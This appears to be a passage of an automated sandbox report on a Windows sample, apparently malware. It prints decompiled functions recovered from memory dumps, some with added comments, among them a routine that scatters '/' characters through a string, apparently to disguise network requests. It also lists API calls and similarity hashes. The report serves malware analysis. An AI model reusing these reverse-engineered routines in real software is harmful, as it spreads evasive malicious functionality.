                              				intOrPtr* _t71;
                              				intOrPtr* _t74;
                              				intOrPtr* _t76;
                              				intOrPtr _t78;
                              				intOrPtr* _t82;
                              				intOrPtr* _t86;
                              				intOrPtr _t102;
                              				intOrPtr _t108;
                              				void* _t117;
                              				void* _t121;
                              				void* _t122;
                              				intOrPtr _t129;
                              
                              				_t122 = _t121 - 0x3c;
                              				_push( &_v8);
                              				_push(__eax);
                              				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                              				if(_t117 >= 0) {
                              					_t54 = _v8;
                              					_t102 =  *0x49dd2b8; // 0xe3a5a8
                              					_t5 = _t102 + 0x49de038; // 0x3050f485
                              					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                              					_t56 = _v8;
                              					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                              					if(_t117 >= 0) {
                              						__imp__#2(0x49dc2b0);
                              						_v28 = _t57;
                              						if(_t57 == 0) {
                              							_t117 = 0x8007000e;
                              						} else {
                              							_t60 = _v32;
                              							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                              							_t86 = __imp__#6;
                              							_t117 = _t61;
                              							if(_t117 >= 0) {
                              								_t63 = _v24;
                              								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                              								if(_t117 >= 0) {
                              									_t129 = _v20;
                              									if(_t129 != 0) {
                              										_v64 = 3;
                              										_v48 = 3;
                              										_v56 = 0;
                              										_v40 = 0;
                              										if(_t129 > 0) {
                              											while(1) {
                              												_t67 = _v24;
                              												asm("movsd");
                              												asm("movsd");
                              												asm("movsd");
                              												asm("movsd");
                              												_t122 = _t122;
                              												asm("movsd");
                              												asm("movsd");
                              												asm("movsd");
                              												asm("movsd");
                              												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                              												if(_t117 < 0) {
                              													goto L16;
                              												}
                              												_t69 = _v8;
                              												_t108 =  *0x49dd2b8; // 0xe3a5a8
                              												_t28 = _t108 + 0x49de0bc; // 0x3050f1ff
                              												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                              												if(_t117 >= 0) {
                              													_t74 = _v16;
                              													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                              													if(_t117 >= 0 && _v12 != 0) {
                              														_t78 =  *0x49dd2b8; // 0xe3a5a8
                              														_t33 = _t78 + 0x49de078; // 0x76006f
                              														if(lstrcmpW(_v12, _t33) == 0) {
                              															_t82 = _v16;
                              															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                              														}
                              														 *_t86(_v12);
                              													}
                              													_t76 = _v16;
                              													 *((intOrPtr*)( *_t76 + 8))(_t76);
                              												}
                              												_t71 = _v8;
                              												 *((intOrPtr*)( *_t71 + 8))(_t71);
                              												_v40 = _v40 + 1;
                              												if(_v40 < _v20) {
                              													continue;
                              												}
                              												goto L16;
                              											}
                              										}
                              									}
                              								}
                              								L16:
                              								_t65 = _v24;
                              								 *((intOrPtr*)( *_t65 + 8))(_t65);
                              							}
                              							 *_t86(_v28);
                              						}
                              						_t58 = _v32;
                              						 *((intOrPtr*)( *_t58 + 8))(_t58);
                              					}
                              				}
                              				return _t117;
                              			}


                              APIs
                              • SysAllocString.OLEAUT32(049DC2B0), ref: 049D52F1
                              • lstrcmpW.KERNEL32(00000000,0076006F), ref: 049D53D3
                              • SysFreeString.OLEAUT32(00000000), ref: 049D53EC
                              • SysFreeString.OLEAUT32(?), ref: 049D541B
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$Free$Alloclstrcmp
                              • String ID:
                              • API String ID: 1885612795-0
                              • Opcode ID: 01244a7c1477d22ef56faf4d64a536807e9a056af40a3a7acd123343aee09d68
                              • Instruction ID: b51e0615bcc128a8cbaad46c8ae86d32788069d910369fd42a4d0aa768642a68
                              • Opcode Fuzzy Hash: 01244a7c1477d22ef56faf4d64a536807e9a056af40a3a7acd123343aee09d68
                              • Instruction Fuzzy Hash: 35516E71D00519EFCB00DFA8C488CAEF7BAFF88315B1586A8E915EB214D771AD41CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • SysAllocString.OLEAUT32(?), ref: 049D4327
                              • SysFreeString.OLEAUT32(?), ref: 049D440A
                                • Part of subcall function 049D52A1: SysAllocString.OLEAUT32(049DC2B0), ref: 049D52F1
                              • SafeArrayDestroy.OLEAUT32(?), ref: 049D445E
                              • SysFreeString.OLEAUT32(?), ref: 049D446C
                                • Part of subcall function 049D2C14: Sleep.KERNEL32(000001F4), ref: 049D2C5C
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: String$AllocFree$ArrayDestroySafeSleep
                              • String ID:
                              • API String ID: 3193056040-0
                              • Opcode ID: 561148631e5515020cbc67eb913c94968ebcbdbb504a2fd3273f687dd76e753e
                              • Instruction ID: f2cdad1c4a5cf92d42b2fa0131a9df93a4e59ac0f45857d6a2c0ee82ccad8715
                              • Opcode Fuzzy Hash: 561148631e5515020cbc67eb913c94968ebcbdbb504a2fd3273f687dd76e753e
                              • Instruction Fuzzy Hash: C8512A76900209AFDF00DFA8C8848AEB7F6FF88304B15C978E615EB214D775AD86CB51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 85%
                              			E049D2698(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                              				intOrPtr _v8;
                              				intOrPtr _v12;
                              				signed int _v16;
                              				void _v156;
                              				void _v428;
                              				void* _t55;
                              				unsigned int _t56;
                              				signed int _t66;
                              				signed int _t74;
                              				void* _t76;
                              				signed int _t79;
                              				void* _t81;
                              				void* _t92;
                              				void* _t96;
                              				signed int* _t99;
                              				signed int _t101;
                              				signed int _t103;
                              				void* _t107;
                              
                              				_t92 = _a12;
                              				_t101 = __eax;
                              				_t55 = E049D455D(_a16, _t92);
                              				_t79 = _t55;
                              				if(_t79 == 0) {
                              					L18:
                              					return _t55;
                              				}
                              				_t56 =  *(_t92 + _t79 * 4 - 4);
                              				_t81 = 0;
                              				_t96 = 0x20;
                              				if(_t56 == 0) {
                              					L4:
                              					_t97 = _t96 - _t81;
                              					_v12 = _t96 - _t81;
                              					E049D6CD0(_t79,  &_v428);
                              					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E049D21F3(_t101,  &_v428, _a8, _t96 - _t81);
                              					E049D21F3(_t79,  &_v156, _a12, _t97);
                              					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                              					_t66 = E049D6CD0(_t101,  &E049DD168);
                              					_t103 = _t101 - _t79;
                              					_a8 = _t103;
                              					if(_t103 < 0) {
                              						L17:
                              						E049D6CD0(_a16, _a4);
                              						E049D3213(_t79,  &_v428, _a4, _t97);
                              						memset( &_v428, 0, 0x10c);
                              						_t55 = memset( &_v156, 0, 0x84);
                              						goto L18;
                              					}
                              					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                              					do {
                              						if(_v8 != 0xffffffff) {
                              							_push(1);
                              							_push(0);
                              							_push(0);
                              							_push( *_t99);
                              							L049DB030();
                              							_t74 = _t66 +  *(_t99 - 4);
                              							asm("adc edx, esi");
                              							_push(0);
                              							_push(_v8 + 1);
                              							_push(_t92);
                              							_push(_t74);
                              							L049DB02A();
                              							if(_t92 > 0 || _t74 > 0xffffffff) {
                              								_t74 = _t74 | 0xffffffff;
                              								_v16 = _v16 & 0x00000000;
                              							}
                              						} else {
                              							_t74 =  *_t99;
                              						}
                              						_t106 = _t107 + _a8 * 4 - 0x1a8;
                              						_a12 = _t74;
                              						_t76 = E049D3CAA(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                              						while(1) {
                              							 *_t99 =  *_t99 - _t76;
                              							if( *_t99 != 0) {
                              								goto L14;
                              							}
                              							L13:
                              							_t92 =  &_v156;
                              							if(E049D675C(_t79, _t92, _t106) < 0) {
                              								break;
                              							}
                              							L14:
                              							_a12 = _a12 + 1;
                              							_t76 = E049D9089(_t79,  &_v156, _t106, _t106);
                              							 *_t99 =  *_t99 - _t76;
                              							if( *_t99 != 0) {
                              								goto L14;
                              							}
                              							goto L13;
                              						}
                              						_a8 = _a8 - 1;
                              						_t66 = _a12;
                              						_t99 = _t99 - 4;
                              						 *(_a8 * 4 +  &E049DD168) = _t66;
                              					} while (_a8 >= 0);
                              					_t97 = _v12;
                              					goto L17;
                              				}
                              				while(_t81 < _t96) {
                              					_t81 = _t81 + 1;
                              					_t56 = _t56 >> 1;
                              					if(_t56 != 0) {
                              						continue;
                              					}
                              					goto L4;
                              				}
                              				goto L4;
                              			}


                              APIs
                              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 049D274B
                              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 049D2761
                              • memset.NTDLL ref: 049D280A
                              • memset.NTDLL ref: 049D2820
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: memset$_allmul_aulldiv
                              • String ID:
                              • API String ID: 3041852380-0
                              • Opcode ID: 518ae4809529f9be31d2d7cd1a7be169b36e4e285a1f3ba41686eaaf432c9d0c
                              • Instruction ID: d1817a25cc8521f0dd379fb5ba8c990552d4d2fd977646e5c536d35ca6510f29
                              • Opcode Fuzzy Hash: 518ae4809529f9be31d2d7cd1a7be169b36e4e285a1f3ba41686eaaf432c9d0c
                              • Instruction Fuzzy Hash: 51418031B01219AFEB209F68DC40BEE7779EF85314F10C5B9E919A7280DB70BE548B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 053E3D87
                              • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 053E3D9D
                              • memset.NTDLL ref: 053E3E46
                              • memset.NTDLL ref: 053E3E5C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: memset$_allmul_aulldiv
                              • String ID:
                              • API String ID: 3041852380-0
                              • Opcode ID: 8596bac94d2a9767fcf40998b051c2dc8b68f46efa9bd93c5151ac50f304f1db
                              • Instruction ID: 58fd16fe762dc75e8958470f79502d90210b28ac2b5768c3b07bf3bf5ab53b7b
                              • Opcode Fuzzy Hash: 8596bac94d2a9767fcf40998b051c2dc8b68f46efa9bd93c5151ac50f304f1db
                              • Instruction Fuzzy Hash: 21418332B00229ABDB20DF68DC84BEFB7B9EF45710F104569F915A71C0DB70AE558B91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053D6A98: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000), ref: 053D6AA6
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 053C6CF8
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 053C6D47
                                • Part of subcall function 053C6D99: CreateFileW.KERNEL32(00000000,C0000000,053C23FB,00000000,053C23FC,00000080,00000000,00000000,053E8BAA,747869A0,053C23FB,?), ref: 053C6DDA
                                • Part of subcall function 053C6D99: GetLastError.KERNEL32 ref: 053C6DE4
                                • Part of subcall function 053C6D99: WaitForSingleObject.KERNEL32(000000C8), ref: 053C6E09
                                • Part of subcall function 053C6D99: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 053C6E2A
                                • Part of subcall function 053C6D99: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 053C6E52
                                • Part of subcall function 053C6D99: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 053C6E67
                                • Part of subcall function 053C6D99: SetEndOfFile.KERNEL32(00000001), ref: 053C6E74
                                • Part of subcall function 053C6D99: CloseHandle.KERNEL32(00000001), ref: 053C6E8C
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,00000000,?,?,?,00000000,?,00000001), ref: 053C6D7C
                              • HeapFree.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 053C6D8C
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
                              • String ID:
                              • API String ID: 4200334623-0
                              • Opcode ID: e984ed33bb9b972392b4843e751c5c4355c68c3905166da0662b2ce433f24ed9
                              • Instruction ID: 0b6c1feefbfe2d1110f17febb254d9cc65a29c37268f84d6a937f4c8a6c350ca
                              • Opcode Fuzzy Hash: e984ed33bb9b972392b4843e751c5c4355c68c3905166da0662b2ce433f24ed9
                              • Instruction Fuzzy Hash: D4310AB6510119BFDB109FA8DC8ECAABFBDFB08354B104065F502DB161DB71AE51DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 053DBC6B
                              • memcpy.NTDLL(00000018,?,?), ref: 053DBC94
                              • RegisterWaitForSingleObject.KERNEL32(00000010,?,Function_0000A97F,00000000,000000FF,00000008), ref: 053DBCD3
                              • HeapFree.KERNEL32(00000000,00000000), ref: 053DBCE6
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                              • String ID:
                              • API String ID: 2780211928-0
                              • Opcode ID: 7df587967b016fe5c0d424299bbd0cd20ac40e6531a8a687e5ed1078bb1f7f21
                              • Instruction ID: 36e25770ccfadd603173aadbe5a775f589f63ab200348681811b862da3bb21c9
                              • Opcode Fuzzy Hash: 7df587967b016fe5c0d424299bbd0cd20ac40e6531a8a687e5ed1078bb1f7f21
                              • Instruction Fuzzy Hash: F3315E75200209AFDB208F19EC49E5ABFBDFF44320F004129F916DB291DBB0E955DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TlsGetValue.KERNEL32(?), ref: 053C1C32
                              • SetEvent.KERNEL32(?), ref: 053C1C7C
                              • TlsSetValue.KERNEL32(00000001), ref: 053C1CB6
                              • TlsSetValue.KERNEL32(00000000), ref: 053C1CD2
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: Value$Event
                              • String ID:
                              • API String ID: 3803239005-0
                              • Opcode ID: f52d5478218e34cabb98e9a05b33bd08c9a3320dbb4154b3644834f3f5207cd2
                              • Instruction ID: 2b16b03df8807ba68436d87d6efbca3d5384076c927e315da5eb5961efc364b2
                              • Opcode Fuzzy Hash: f52d5478218e34cabb98e9a05b33bd08c9a3320dbb4154b3644834f3f5207cd2
                              • Instruction Fuzzy Hash: 5121AE31210208AFDB369F29DD8996A7FAAFF41350F55886DF402CA1A1D7B1EC52EB50
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
                              			// Fetches a wide string from an object through two virtual calls (vtable slots +0x24 and
                              			// +0x100), duplicates it into a buffer from E049D55DC, releases the original, and returns
                              			// the copy and its byte length through _a4 / _a8. The instruction address of each statement
                              			// is given on the right.
                              			E049D7796(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                              				intOrPtr _v8;
                              				void* _v12;
                              				void* _v16;
                              				intOrPtr _t26;
                              				intOrPtr* _t28;
                              				intOrPtr _t31;
                              				intOrPtr* _t32;
                              				void* _t39;
                              				int _t46;
                              				intOrPtr* _t47;
                              				int _t48;
                              
                              				_t47 = __eax;                                                       // 0x049d77a2
                              				_push( &_v12);                                                      // 0x049d77a6
                              				_push(__eax);                                                       // 0x049d77a7
                              				_t39 = 0;                                                           // 0x049d77a8
                              				_t46 = 0;                                                           // 0x049d77aa
                              				_t26 =  *((intOrPtr*)( *__eax + 0x24))();                           // 0x049d77ac  virtual call, vtable slot +0x24
                              				_v8 = _t26;                                                         // 0x049d77b1
                              				if(_t26 < 0) {                                                      // 0x049d77b4  negative HRESULT: fail
                              					L13:                                                            // 0x049d784b
                              					return _v8;                                                     // 0x049d7852
                              				}                                                                   // 0x049d7852
                              				if(_v12 == 0) {                                                     // 0x049d77bd
                              					Sleep(0xc8);                                                    // 0x049d77c4  wait 200 ms, then retry once
                              					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);             // 0x049d77d4
                              				}                                                                   // 0x049d77d4
                              				if(_v8 >= _t39) {                                                   // 0x049d77da
                              					_t28 = _v12;                                                    // 0x049d77dc
                              					if(_t28 != 0) {                                                 // 0x049d77e1
                              						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);       // 0x049d77ea  virtual call, slot +0x100, returns a string in _v16
                              						_v8 = _t31;                                                 // 0x049d77f2
                              						if(_t31 >= 0) {                                             // 0x049d77f5
                              							_t46 = lstrlenW(_v16);                                  // 0x049d7800
                              							if(_t46 != 0) {                                         // 0x049d7804
                              								_t46 = _t46 + 1;                                    // 0x049d7806  include the terminator
                              								_t48 = _t46 + _t46;                                 // 0x049d7807  byte size of the UTF-16 string
                              								_t39 = E049D55DC(_t48);                             // 0x049d7810  allocate copy
                              								if(_t39 == 0) {                                     // 0x049d7814
                              									_v8 = 0x8007000e;                               // 0x049d7825  E_OUTOFMEMORY
                              								} else {                                            // 0x049d7816
                              									memcpy(_t39, _v16, _t48);                       // 0x049d781b
                              								}                                                   // 0x049d7820
                              								__imp__#6(_v16);                                    // 0x049d782f  OLEAUT32 ordinal 6 = SysFreeString
                              							}                                                       // 0x049d782f
                              						}                                                           // 0x049d7804
                              						_t32 = _v12;                                                // 0x049d7835
                              						 *((intOrPtr*)( *_t32 + 8))(_t32);                          // 0x049d783b  slot +8 (IUnknown::Release if this is a COM interface)
                              					}                                                               // 0x049d783b
                              					 *_a4 = _t39;                                                   // 0x049d7844  out: copied string
                              					 *_a8 = _t46 + _t46;                                            // 0x049d7849  out: its size in bytes
                              				}                                                                   // 0x049d7849
                              				goto L13;                                                           // 0x00000000
                              			}

                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.674779449.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true
                              • Associated: 00000003.00000002.674748179.00000000049D0000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674876280.00000000049DC000.00000002.00020000.sdmp
                              • Associated: 00000003.00000002.674899025.00000000049DD000.00000004.00020000.sdmp
                              • Associated: 00000003.00000002.674917059.00000000049DF000.00000002.00020000.sdmp
                              Similarity
                              • API ID: FreeSleepStringlstrlenmemcpy
                              • String ID:
                              • API String ID: 1198164300-0
                              • Opcode ID: b8e41626cfaea481d489e70467f58562ddf84eab48d5f21b0308b2bc24b521c1
                              • Instruction ID: ed0e9898c6de7f7629c3db220c30da3e8a5f1f4178bd1da13c604bc14b432672
                              • Opcode Fuzzy Hash: b8e41626cfaea481d489e70467f58562ddf84eab48d5f21b0308b2bc24b521c1
                              • Instruction Fuzzy Hash: 1B212175A01209EFDB11DFE8D88499EBBB9FF89315B1081B9E905E7210E774EA41CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 053CEF00
                              • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 053CEF44
                              • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 053CEF87
                              • CloseHandle.KERNEL32(?,?,?,?,?), ref: 053CEFAA
                                • Part of subcall function 053DD6A6: GetTickCount.KERNEL32 ref: 053DD6B6
                                • Part of subcall function 053DD6A6: CreateFileW.KERNEL32(053C4252,80000000,00000003,053F0244,00000003,00000000,00000000,?,00000000,?,053C4252), ref: 053DD6D3
                                • Part of subcall function 053DD6A6: GetFileSize.KERNEL32(053C4252,00000000,?,00000001,?,00000000,?,053C4252), ref: 053DD706
                                • Part of subcall function 053DD6A6: CreateFileMappingA.KERNEL32(053C4252,053F0244,00000002,00000000,00000000,053C4252), ref: 053DD71A
                                • Part of subcall function 053DD6A6: lstrlen.KERNEL32(053C4252,?,00000000,?,053C4252), ref: 053DD736
                                • Part of subcall function 053DD6A6: lstrcpy.KERNEL32(?,053C4252), ref: 053DD746
                                • Part of subcall function 053DD6A6: HeapFree.KERNEL32(00000000,053C4252,?,00000000,?,053C4252), ref: 053DD761
                                • Part of subcall function 053DD6A6: CloseHandle.KERNEL32(053C4252,?,00000001,?,00000000,?,053C4252), ref: 053DD773
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                              • String ID:
                              • API String ID: 3239194699-0
                              • Opcode ID: 35378875553c52bc0e73c526ea68387f4d1efb8720b71a07f5f0b1fe0340bd76
                              • Instruction ID: 897e8c90e3e5debcbc96e6a1d437f7dddcd2caa848c97286b2eadf0d317789f1
                              • Opcode Fuzzy Hash: 35378875553c52bc0e73c526ea68387f4d1efb8720b71a07f5f0b1fe0340bd76
                              • Instruction Fuzzy Hash: 75216B72500208EEDB22DF65DC48EDEBFBDFF44710F150129F915961A0D7318805DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memset.NTDLL ref: 053C4CF4
                              • lstrlen.KERNEL32(053C2C01), ref: 053C4D04
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • strcpy.NTDLL ref: 053C4D1B
                              • StrChrA.SHLWAPI(00000000,0000003A,00000001), ref: 053C4D25
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: AllocateHeaplstrlenmemsetstrcpy
                              • String ID:
                              • API String ID: 528014985-0
                              • Opcode ID: 69d5aa7d9231bbf9aa78a62ec6a382595ed78d351385604290847d1521555c83
                              • Instruction ID: a7ce2b1a6615b4d155a863c74827b7b181f0ce4a9acd9bdc5be8237a165c19e8
                              • Opcode Fuzzy Hash: 69d5aa7d9231bbf9aa78a62ec6a382595ed78d351385604290847d1521555c83
                              • Instruction Fuzzy Hash: B021CF76214301ABDB21AF64E85DB2A7BFDBB84312F10845CF9568B292EBB1D8008721
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 053E4BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,053C3E20), ref: 053E4BF0
                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 053C3E5B
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,053C68F0,?), ref: 053C3E6D
                              • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,053C68F0,?), ref: 053C3E85
                              • CloseHandle.KERNEL32(?,?,?,?,?,?,053C68F0,?), ref: 053C3EA0
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: File$CloseCreateHandleModuleNamePointerRead
                              • String ID:
                              • API String ID: 1352878660-0
                              • Opcode ID: 3edeb7b57d560b5eadf246b49cc124f17d336bc22b8fb7514509775a0fd247f2
                              • Instruction ID: b16a09624c918ea01fbb1e080d00cabeacc3451b7ad0902cdc950a844511032c
                              • Opcode Fuzzy Hash: 3edeb7b57d560b5eadf246b49cc124f17d336bc22b8fb7514509775a0fd247f2
                              • Instruction Fuzzy Hash: F2114F72A01128BBDB21AEA5DC89EEFBFADEF02750F108455F515E6090D7718E40C7A0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,00000000,747C8250,747869A0,?,?,?,053C5AE4,?,00000000,?), ref: 053D2DEE
                                • Part of subcall function 053D032D: RtlAllocateHeap.NTDLL(00000000,?,053E24D0), ref: 053D0339
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,053C5AE4,?,00000000,?), ref: 053D2E10
                              • lstrcpyW.KERNEL32(00000000,?), ref: 053D2E3C
                              • lstrcatW.KERNEL32(00000000,?), ref: 053D2E4F
                                • Part of subcall function 053E41EE: strstr.NTDLL ref: 053E42C6
                                • Part of subcall function 053E41EE: strstr.NTDLL ref: 053E4319
                              Memory Dump Source
                              • Source File: 00000003.00000002.675063675.00000000053C0000.00000040.00020000.sdmp, Offset: 053C0000, based on PE: false
                              Similarity
                              • API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
                              • String ID:
                              • API String ID: 3712611166-0
                              • Opcode ID: cc1f18836609f7b30ab7d05d2f175ac701fef1800549f721d05d0d7ddc7e3e48
                              • Instruction ID: a77788b53fdd943d43bc664fba29a1c1f79e43936cd08c6165c8d5e000370cca
                              • Opcode Fuzzy Hash: cc1f18836609f7b30ab7d05d2f175ac701fef1800549f721d05d0d7ddc7e3e48
                              • Instruction Fuzzy Hash: C011FF76600119BB9B21AFA5EC8CDAFBFBDFF09291B004125F9059B150DB719A419BA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 68%
                              			// Copies a NUL-terminated string into a new heap buffer, inserting a '/' after every chunk
                              			// of 8..23 bytes; chunk lengths come from a 32-bit LCG whose state lives at 0x49dd288.
                              			// The instruction address of each statement is given on the right.
                              			E049D484D(unsigned int __eax, void* __ecx) {
                              				void* _v8;
                              				void* _v12;
                              				signed int _t21;
                              				signed short _t23;
                              				char* _t27;
                              				void* _t29;
                              				void* _t30;
                              				unsigned int _t33;
                              				void* _t37;
                              				unsigned int _t38;
                              				void* _t41;
                              				void* _t42;
                              				int _t45;
                              				void* _t46;
                              
                              				_t42 = __eax;                                                       // 0x049d4855
                              				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);                     // 0x049d4858  lstrlen (see the API list below)
                              				_t38 = __eax;                                                       // 0x049d485e  remaining byte count
                              				_t30 = RtlAllocateHeap( *0x49dd270, 0, (__eax >> 3) + __eax + 1);   // 0x049d4876  room for one '/' per 8 bytes plus NUL
                              				_v12 = _t30;                                                        // 0x049d487a
                              				if(_t30 != 0) {                                                     // 0x049d487d
                              					_v8 = _t42;                                                     // 0x049d487f  source cursor
                              					do {                                                            // 0x049d4882
                              						_t33 = 0x18;                                                // 0x049d4884  window = min(24, remaining)
                              						if(_t38 <= _t33) {                                          // 0x049d4887
                              							_t33 = _t38;                                            // 0x049d4889
                              						}                                                           // 0x049d4889
                              						_t21 =  *0x49dd288; // 0xebf23b00                           // 0x049d488b  LCG state
                              						_t23 = 0x3c6ef35f + _t21 * 0x19660d;                        // 0x049d4896  state = state * 0x19660D + 0x3C6EF35F
                              						 *0x49dd288 = _t23;                                         // 0x049d489b
                              						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;       // 0x049d48ac  chunk = (state & 0xffff) % (window - 8) + 8
                              						memcpy(_t30, _v8, _t45);                                    // 0x049d48b4
                              						_v8 = _v8 + _t45;                                           // 0x049d48b9
                              						_t27 = _t30 + _t45;                                         // 0x049d48bc
                              						_t38 = _t38 - _t45;                                         // 0x049d48bf
                              						_t46 = _t46 + 0xc;                                          // 0x049d48c1  cdecl stack cleanup for memcpy
                              						 *_t27 = 0x2f;                                              // 0x049d48c7  '/'
                              						_t13 = _t27 + 1; // 0x1                                     // 0x049d48ca
                              						_t30 = _t13;                                                // 0x049d48ca
                              					} while (_t38 > 8);                                             // 0x049d48ca
                              					memcpy(_t30, _v8, _t38 + 1);                                    // 0x049d48d5  tail (at most 8 bytes) plus NUL
                              				}                                                                   // 0x049d48da
                              				return _v12;                                                        // 0x049d48e4
                              			}

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,049DA88E,00000000,?,74785520,049D64DC,?,058195B0), ref: 049D4858
                              • RtlAllocateHeap.NTDLL(00000000,?), ref: 049D4870
                              • memcpy.NTDLL(00000000,058195B0,-00000008,?,?,?,049DA88E,00000000,?,74785520,049D64DC,?,058195B0), ref: 049D48B4
                              • memcpy.NTDLL(00000001,058195B0,00000001,049D64DC,?,058195B0), ref: 049D48D5
                              Memory Dump Source
